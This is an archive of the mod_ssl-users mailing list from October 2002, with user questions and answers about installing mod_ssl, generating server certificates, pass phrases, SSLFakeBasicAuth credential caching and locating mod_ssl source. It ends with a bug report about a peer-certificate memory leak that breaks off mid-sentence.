> server requires client certificates. 
> 
> Is it possible to configure apache + mod_ssl to
> authenticate itself to the
> other server?
> 
> -Torvald
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________________________
Do you Yahoo!?
Y! Web Hosting - Let the expert host your web site
http://webhosting.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 22:54:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA11101; Thu, 24 Oct 2002 22:53:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns2.igmail.integratedgenomics.com id WAA11093; Thu, 24 Oct 2002 22:52:55 +0200 (MET DST)
From: Dinos@IntegratedGenomics.com
Received: by ns2.igmail.integratedgenomics.com with Internet Mail Service (5.5.2656.59)
	id <4VK65YWC>; Thu, 24 Oct 2002 15:47:43 -0500
Message-ID: 
To: modssl-users@modssl.org
Subject: Prblems understanding on how to install mod_ssl!
Date: Thu, 24 Oct 2002 15:47:32 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dinos@IntegratedGenomics.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The INSTALL file when I untar mod_ssl says:
Configure and build the SSL library:
./config
make
make test

but it does not says to install nor does it gives you the instruction to do:
make install

Do I have to do this step.
Then what is server.key and server.crt
What step of which program generates them and where does it put them.
Once again the INSTALL file says if your server (which server? apache is not
installed yet)
has certificates allreaty provide the path else run make certificate!  Run
certificate where?

Thanx in advance
Dino
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 23:15:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA11957; Thu, 24 Oct 2002 23:14:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id XAA11951; Thu, 24 Oct 2002 23:13:38 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id F20CE4CE736; Thu, 24 Oct 2002 23:13:36 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B7D65286D6; Thu, 24 Oct 2002 23:12:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id TAA05850; Thu, 24 Oct 2002 19:29:04 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 24 Oct 2002 10:27:56 -0700
Received: from 200.23.204.1 by pv3fd.pav3.hotmail.msn.com with HTTP;
	Thu, 24 Oct 2002 17:27:56 GMT
X-Originating-IP: [200.23.204.1]
From: "Miguel Angel Gomez Animas" 
To: modssl-users@modssl.org
Subject: Certificate Server
Date: Thu, 24 Oct 2002 12:27:56 -0500
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 24 Oct 2002 17:27:56.0397 (UTC) FILETIME=[B0EB49D0:01C27B82]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Miguel Angel Gomez Animas" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users




Hi all....

I want to know if is possible create a server certificate with modssl, 
something like a personal verisign or something like this...

What do i have to do???, can you help me with this???

Thanks a lot!!!!


_________________________________________________________________
Internet access plans that fit your lifestyle -- join MSN. 
http://resourcecenter.msn.com/access/plans/default.asp
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 23:24:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA12566; Thu, 24 Oct 2002 23:23:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id XAA12545; Thu, 24 Oct 2002 23:22:08 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 882092718B; Thu, 24 Oct 2002 14:13:06 -0700 (PDT)
Date: Thu, 24 Oct 2002 14:13:06 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Prblems understanding on how to install mod_ssl!
Message-ID: <20021024211306.GA24470@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


For detailed instructions on running mod_ssl for Apache 2
you can checkout a chapter I have online:
http://www.apacheworld.org/ty24/site.chapter17.html
It includes details on how to build openssl and use the openssl command line
tool to generate your certificate and key

Cheers

Daniel

On Thu, Oct 24, 2002 at 03:47:32PM -0500, Dinos@IntegratedGenomics.com wrote:
> The INSTALL file when I untar mod_ssl says:
> Configure and build the SSL library:
> ./config
> make
> make test
> 
> but it does not says to install nor does it gives you the instruction to do:
> make install
> 
> Do I have to do this step.
> Then what is server.key and server.crt
> What step of which program generates them and where does it put them.
> Once again the INSTALL file says if your server (which server? apache is not
> installed yet)
> has certificates allreaty provide the path else run make certificate!  Run
> certificate where?
> 
> Thanx in advance
> Dino
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 23:30:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA12733; Thu, 24 Oct 2002 23:29:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from zeus.doublesparks.net id XAA12721; Thu, 24 Oct 2002 23:28:22 +0200 (MET DST)
Received: from doublesparks.net (localhost [127.0.0.1])
	by zeus.doublesparks.net (Postfix) with SMTP
	id B8B0C13B06; Thu, 24 Oct 2002 15:28:11 -0600 (MDT)
Message-ID: <5301.208.169.18.3.1035494891.squirrel@www.doublesparks.net>
Date: Thu, 24 Oct 2002 15:28:11 -0600 (MDT)
Subject: Re: Certificate Server
From: "Alan Sparks" 
To: 
In-Reply-To: 
References: 
X-Priority: 3
Importance: Normal
X-MSMail-Priority: Normal
Cc: 
X-Mailer: SquirrelMail (version 1.2.7)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alan Sparks" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

No.
But you might want to look for the TinyCA or OpenCA projects... try a
Google search.
-Alan

Miguel Angel Gomez Animas said:
>
>
>
> Hi all....
>
> I want to know if is possible create a server certificate with modssl,
> something like a personal verisign or something like this...
>
> What do i have to do???, can you help me with this???
>
> Thanks a lot!!!!
>
>
> _________________________________________________________________
> Internet access plans that fit your lifestyle -- join MSN.
> http://resourcecenter.msn.com/access/plans/default.asp
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


===========
Alan Sparks, UNIX/Linux Systems Administrator    


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 25 01:13:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA16892; Fri, 25 Oct 2002 01:12:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns2.igmail.integratedgenomics.com id BAA16877; Fri, 25 Oct 2002 01:11:38 +0200 (MET DST)
From: Dinos@IntegratedGenomics.com
Received: by ns2.igmail.integratedgenomics.com with Internet Mail Service (5.5.2656.59)
	id <4VK65YYX>; Thu, 24 Oct 2002 18:06:07 -0500
Message-ID: 
To: modssl-users@modssl.org
Subject: RE: Prblems understanding on how to install mod_ssl!
Date: Thu, 24 Oct 2002 18:05:57 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="koi8-r"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dinos@IntegratedGenomics.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

 Ok I got it!  However during installation you need to create certificates.
You are asked a few questions.  Is there a way to automate this and do an
installation w/o having to prompt the user?(e.c. preedit a conf file)
Moreover when you try to 
start apache w/ ssl you are prompted for the pass phrase!  Why?  Is there a
way to disable this?

Best
Dino
P.S.  I am running apache 1.3.27

-----Original Message-----
From: Daniel Lopez
To: modssl-users@modssl.org
Sent: 10/24/2002 4:13 PM
Subject: Re: Prblems understanding on how to install mod_ssl!


For detailed instructions on running mod_ssl for Apache 2
you can checkout a chapter I have online:
http://www.apacheworld.org/ty24/site.chapter17.html
It includes details on how to build openssl and use the openssl command
line
tool to generate your certificate and key

Cheers

Daniel

On Thu, Oct 24, 2002 at 03:47:32PM -0500, Dinos@IntegratedGenomics.com
wrote:
> The INSTALL file when I untar mod_ssl says:
> Configure and build the SSL library:
> ./config
> make
> make test
> 
> but it does not says to install nor does it gives you the instruction
to do:
> make install
> 
> Do I have to do this step.
> Then what is server.key and server.crt
> What step of which program generates them and where does it put them.
> Once again the INSTALL file says if your server (which server? apache
is not
> installed yet)
> has certificates allreaty provide the path else run make certificate!
Run
> certificate where?
> 
> Thanx in advance
> Dino
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 25 07:00:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA27714; Fri, 25 Oct 2002 06:59:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id GAA27700; Fri, 25 Oct 2002 06:58:12 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g9P4w9a07624
	for ; Fri, 25 Oct 2002 06:58:09 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Fri Oct 25 06:58:08 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 25 Oct 2002 06:58:08 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 25 Oct 2002 06:58:08 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 25 Oct 2002 06:58:08 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Certificate Server
Date: Fri, 25 Oct 2002 06:58:07 +0200
Message-ID: 
Thread-Topic: Certificate Server
Thread-Index: AcJ7oqKQ+z/R3tevQKKG42GPGmbZTQAQCUHw
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 25 Oct 2002 04:58:08.0368 (UTC) FILETIME=[1C609700:01C27BE3]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id GAB27705
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Miguel

It is possible to create your own CA certificate and then create a
server certificate which gets signed by your own CA key.

You do these using openssl.

Check http://www.freebsddiary.org/openssl-client-authentication.php

He talks about client authentication but he is really doing server
authentication.

Regards
Jose


-----Original Message-----
From: Miguel Angel Gomez Animas [mailto:miguelangelga@msn.com]
Sent: 24 October 2002 19:28
To: modssl-users@modssl.org
Subject: Certificate Server





Hi all....

I want to know if is possible create a server certificate with modssl,

something like a personal verisign or something like this...

What do i have to do???, can you help me with this???

Thanks a lot!!!!


_________________________________________________________________
Internet access plans that fit your lifestyle -- join MSN. 
http://resourcecenter.msn.com/access/plans/default.asp
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 25 17:43:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA17814; Fri, 25 Oct 2002 17:42:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns2.igmail.integratedgenomics.com id RAA17807; Fri, 25 Oct 2002 17:42:01 +0200 (MET DST)
From: Dinos@IntegratedGenomics.com
Received: by ns2.igmail.integratedgenomics.com with Internet Mail Service (5.5.2656.59)
	id <4VK65ZF7>; Fri, 25 Oct 2002 10:36:50 -0500
Message-ID: 
To: modssl-users@modssl.org
Subject: One last question!
Date: Fri, 25 Oct 2002 10:36:47 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dinos@IntegratedGenomics.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

When I try to access port 443 I get a session where it informs you that you
are accessing
a secure document ..... and then it prompts you for the pass phrase.  I have
accessed secure servers before
and although the browser informs you tha you are accessing a secure document
you do not 
have to engage in this interactive session nor are you prompted for a pass
phrase.  How can the certificate giving 
can be achieved silently and w/o requiring the client to know the pass
phrase?

Best
Dinos
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 25 19:29:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21157; Fri, 25 Oct 2002 19:28:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.fwdsystems.com id TAA21149; Fri, 25 Oct 2002 19:28:07 +0200 (MET DST)
Received: from NTW3261 ([208.234.207.67])
	by mail.fwdsystems.com (Exchange 5.5) with SMTP id g9PHS3VP001758
	for ; Fri, 25 Oct 2002 13:28:05 -0400
From: "Mike Pacheco" 
To: 
Subject: mod_ssl-2.0.40-8
Date: Fri, 25 Oct 2002 13:30:12 -0400
Message-ID: <000b01c27c4c$2c9c1360$c703030a@elcom.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mike Pacheco" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi All,

Been on the mod_ssl site from top to bottom and I can not find mod_ssl for
apache 2.0.40 - I do a custom install of RedHat 8.0 - pick httpd and mod_ssl
and then query the installed packages after it finishes and I test apache
with ssl successfully and I get:

rpm -q mod_ssl = mod_ssl-2.0.40-8

I would like to get my hands on the source for this version of mod_ssl for
some custom install options but I can not seem to find it.  Can somebody
please point me in the right direction?

Thanks

Mike Pacheco

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 25 20:03:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA23118; Fri, 25 Oct 2002 20:02:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR001.sc1.videotron.ca id UAA23034; Fri, 25 Oct 2002 20:01:26 +0200 (MET DST)
Received: from dopey.geoffnet ([24.202.196.188])
 by VL-MS-MR001.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H4J005VLU2KR1@VL-MS-MR001.sc1.videotron.ca> for
 modssl-users@modssl.org; Fri, 25 Oct 2002 14:01:33 -0400 (EDT)
Date: Fri, 25 Oct 2002 14:01:24 -0400
From: Geoff Thorpe 
Subject: Re: mod_ssl-2.0.40-8
In-reply-to: <000b01c27c4c$2c9c1360$c703030a@elcom.com>
To: modssl-users@modssl.org
Message-id: <200210251401.24087.geoff@geoffthorpe.net>
MIME-version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
User-Agent: KMail/1.4.3
References: <000b01c27c4c$2c9c1360$c703030a@elcom.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Friday 25 Oct 2002 1:30 pm, Mike Pacheco wrote:
> Hi All,
>
> Been on the mod_ssl site from top to bottom and I can not find mod_ssl
> for apache 2.0.40 - I do a custom install of RedHat 8.0 - pick httpd
> and mod_ssl and then query the installed packages after it finishes and
> I test apache with ssl successfully and I get:
>
> rpm -q mod_ssl = mod_ssl-2.0.40-8
>
> I would like to get my hands on the source for this version of mod_ssl
> for some custom install options but I can not seem to find it.  Can
> somebody please point me in the right direction?

It's bundled in the source code for Apache2 now. BTW: that's strange
naming for the rpm if it's as you say and Redhat have split the Apache2
modules out.  "apache-mod_ssl" would have made more sense for the ssl
support IMHO.

Anyway, if you get the Apache2 source code, (a tarball from the horse's
mouth mouth, or via source RPMs from Redhat or elsewhere), then you
should find the ssl module sitting in the source.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 25 21:26:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26205; Fri, 25 Oct 2002 21:25:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR003.sc1.videotron.ca id VAA26198; Fri, 25 Oct 2002 21:24:41 +0200 (MET DST)
Received: from dopey.geoffnet
 (modemcable188.196-202-24.mtl.mc.videotron.ca [24.202.196.188])
 by VL-MS-MR003.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H4J00BM0XX2HH@VL-MS-MR003.sc1.videotron.ca> for
 modssl-users@modssl.org; Fri, 25 Oct 2002 15:24:39 -0400 (EDT)
Date: Fri, 25 Oct 2002 15:24:37 -0400
From: Geoff Thorpe 
Subject: Re: mod_ssl-2.0.40-8
In-reply-to: <200210251401.24087.geoff@geoffthorpe.net>
To: modssl-users@modssl.org
Message-id: <200210251524.37846.geoff@geoffthorpe.net>
MIME-version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
User-Agent: KMail/1.4.3
References: <000b01c27c4c$2c9c1360$c703030a@elcom.com>
 <200210251401.24087.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



On Friday 25 Oct 2002 2:01 pm, I wrote:
> Anyway, if you get the Apache2 source code, (a tarball from the horse's
> mouth mouth, or via source RPMs from Redhat or elsewhere), then you
  ^^^^^^^^^^^
I am reminded from time to time that perhaps "vi" might not, after all,
be as appropriate for quickly-blurted emails as it is for coding ...
with this slight slip of the fingers I make an already silly reference
utterly incomprehensible.

Apologies, I meant "a tarball from apache.org".

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 25 22:50:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA28333; Fri, 25 Oct 2002 22:49:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from falcon.mail.pas.earthlink.net id WAA28329; Fri, 25 Oct 2002 22:49:00 +0200 (MET DST)
Received: from gonzo.mail.pas.earthlink.net ([207.217.120.242] helo=gonzo.psp.pas.earthlink.net)
	by falcon.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 185BO5-0005RT-00
	for modssl-users@modssl.org; Fri, 25 Oct 2002 13:48:57 -0700
Received: (from nobody@localhost)
	by gonzo.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g9PKmun13405
	for modssl-users@modssl.org; Fri, 25 Oct 2002 13:48:56 -0700 (PDT)
Date: Fri, 25 Oct 2002 13:48:56 -0700
From: "Ron McKeever"
To: modssl-users@modssl.org
Subject: SSLFakeBasicAuth ?
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron McKeever"
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello 

I have an Apache/1.3.27/mod_ssl/2.8.12/OpenSSL/0.9.6e/Solaris 8 system.

I wanted to use .htaccess without the file .htaccess. SO I found the option to
use SSLFakeBasicAuth in the httpd.conf file. It works and asks for my login. 
My question is what is the timeout after asking for the SSLFakeBasicAuth Dir.
It seems once you get authenticated you can keep clicking on the link without
being asked for your username/password? 

>From httpd.conf:

SSLFakeBasicAuth

    SSLRequireSSL
    Options FollowSymLinks
    AllowOverride none
    AuthUserFile /opt/apache/.htpasswd
    AuthType Basic
    AuthName Watchdog
    Require valid-user


Thanks
Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 25 23:15:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA29272; Fri, 25 Oct 2002 23:14:49 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hermes.dmzc.ideaca.com id XAA29234; Fri, 25 Oct 2002 23:13:27 +0200 (MET DST)
Received: from eris.calg.ideaca.com ([10.99.1.248])
	by hermes.dmzc.ideaca.com (8.12.1/8.11.0) with ESMTP id g9PLDKAc015058
	for ; Fri, 25 Oct 2002 15:13:20 -0600
Received: by eris.calg.ideaca.com with Internet Mail Service (5.5.2655.55)
	id ; Fri, 25 Oct 2002 15:13:19 -0600
Message-ID: <5F11814F87ACD511B05400B0D0785B7E5EEF17@eris.calg.ideaca.com>
From: Jamie Furtner 
To: "'modssl-users@modssl.org'" 
Subject: RE: SSLFakeBasicAuth ?
Date: Fri, 25 Oct 2002 15:13:19 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jamie Furtner 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Browsers cache the username/password and should continue to allow access
until they are restarted -- at least all that I've used do. It is not
controlled by a setting on the server as they are cached and controlled
client-side.

Jamie Furtner

-----Original Message-----
From: Ron McKeever [mailto:rmckeever@earthlink.net]
Sent: Friday, October 25, 2002 2:49 PM
To: modssl-users@modssl.org
Subject: SSLFakeBasicAuth ?


Hello 

I have an Apache/1.3.27/mod_ssl/2.8.12/OpenSSL/0.9.6e/Solaris 8 system.

I wanted to use .htaccess without the file .htaccess. SO I found the option
to
use SSLFakeBasicAuth in the httpd.conf file. It works and asks for my login.

My question is what is the timeout after asking for the SSLFakeBasicAuth
Dir.
It seems once you get authenticated you can keep clicking on the link
without
being asked for your username/password? 

>From httpd.conf:

SSLFakeBasicAuth

    SSLRequireSSL
    Options FollowSymLinks
    AllowOverride none
    AuthUserFile /opt/apache/.htpasswd
    AuthType Basic
    AuthName Watchdog
    Require valid-user


Thanks
Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 26 00:05:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA00500; Sat, 26 Oct 2002 00:04:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id AAA00492; Sat, 26 Oct 2002 00:03:52 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9PM3jiX015545;
	Sat, 26 Oct 2002 00:03:45 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9PM3ifp015544;
	Sat, 26 Oct 2002 00:03:44 +0200 (IST)
Date: Sat, 26 Oct 2002 00:03:44 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Cc: geoff@geoffthorpe.net, rl@math.technion.ac.il
Subject: Bug fix: leak of peer certificate
Message-ID: <20021025220344.GA14812@fermat.math.technion.ac.il>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Hebrew-Date: 20 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

There is a memory leak in mod_ssl-2.8.11-1.3.27 when client-authentication
is used. The peer certificates are leaked - as much as 3-4K per request.

I am enclosing a description of the memory leak, and a suggested patch to
mod_ssl-2.8.11-1.3.27 to fix it. I'd appreciate if it (or some variant of
the same idea) will be applied to mod_ssl.
I haven't yet looked whether the same leak exists in Apache 2 and whether it
should be fixed there too.

Thanks to Zvi Har'El for researching and fixing this bug with me.

Description of the bug:
-----------------------

When Apache+mod_ssl is configured to require authentication of clients, the
X509 certificate that the client sends gets saved inside the SSL_SESSION
object. To access this certificate, OpenSSL provides a function
SSL_get_peer_certificate(). Mod_ssl uses this function in a number of
places, at least once per connection.

OpenSSL's memory management relies on reference counts; an object is not
really freed before its reference counts becomes zero. The
SSL_get_peer_certificate() manual expressly warns that:

      "The reference count of the X509 object is incremented by one, so that
       it will not be destroyed when the session containing the peer
       certificate is freed. The X509 object must be explicitly freed using
       X509_free()."

However, mod_ssl does call SSL_get_peer_certificate() a number of times
without later X509_free'ing its result. Because one such mistake happens
at every connection (in ssl_hook_NewConnection()), peer certificates will
never ever get freed. Not even if the enclosing SSL_SESSION object get freed.

This in-memory certificate object can quite big, in my tests over 3K (over
5 times the size of the rest of the session object). In some circumstances,
if Apache processes do not get killed often enough, this could lead to huge
